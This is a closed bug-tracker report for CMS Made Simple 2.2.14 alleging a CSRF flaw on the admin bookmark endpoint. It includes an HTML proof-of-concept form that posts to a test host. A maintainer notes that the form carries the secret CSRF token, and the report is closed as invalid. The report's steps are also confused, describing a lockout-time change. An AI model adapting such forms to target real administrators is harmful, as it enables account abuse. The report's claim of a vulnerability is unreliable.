CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12316] CSRF on Shortcuts

avatar
Created By: rahul gautam (G@merited)
Date Submitted: Fri May 29 07:52:28 -0400 2020

Assigned To: Fernando Morgado (JoMorg)
Version: 2.2.14
CMSMS Version: 2.2.14
Severity: Major
Resolution: Invalid
State: Closed
Summary:
CSRF on Shortcuts
Detailed Description:
hello,

  I discovered a CSRF vulnerability on ShortcutsSteps to reproduce,

1) Capture the request of changing Locking
2) check all the data extract and make an HTML data for example 

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
<form
action="http://cms.pick/cmsms-2.2.14-install/admin/addbookmark.php?__c=543fbd2ceebe218581e"
method="POST">
      <input type="hidden" name="&#95;&#95;c" value="543fbd2ceebe218581e" />
      <input type="hidden" name="title" value="apple" />
<input type="hidden" name="url"
value="https&#58;&#47;&#47;www&#46;p&#46;com" />
      <input type="hidden" name="addbookmark" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


3) play with the value in and change it
4) send it to the admin and click submit a request
5) The lockout time is changed for admin

This vulnerability affects the CMS Made Simple latest version (2.2.14) and
below. The vulnerability can be mitigated by  using CSRF tokens


History

Comments
avatar 
Date: 2020-09-05 06:48
Posted By: Ruud van der Velden (ruudvdvelden)

For the record; you're also submitting the secret csfr token with your request
(__c=543fbd2ceebe218581e parameter/field). Do you still think this is a CSFR
issue?
avatar 
Date: 2020-09-19 10:21
Posted By: rahul gautam (G@merited)

Hey if that s CSRF token then its not an issue for the time being :)
avatar 
Date: 2020-09-19 10:22
Posted By: rahul gautam (G@merited)

Hey if that s CSRF token then its not an issue for the time being :)
avatar 
Date: 2020-09-19 10:23
Posted By: Ruud van der Velden (ruudvdvelden)

Thanks for confirming.

Report closed as invalid.
Updates

Updated: 2020-09-19 10:23
resolution_id: 10 => 9
state: Open => Closed

Updated: 2020-09-19 09:27
resolution_id: => 10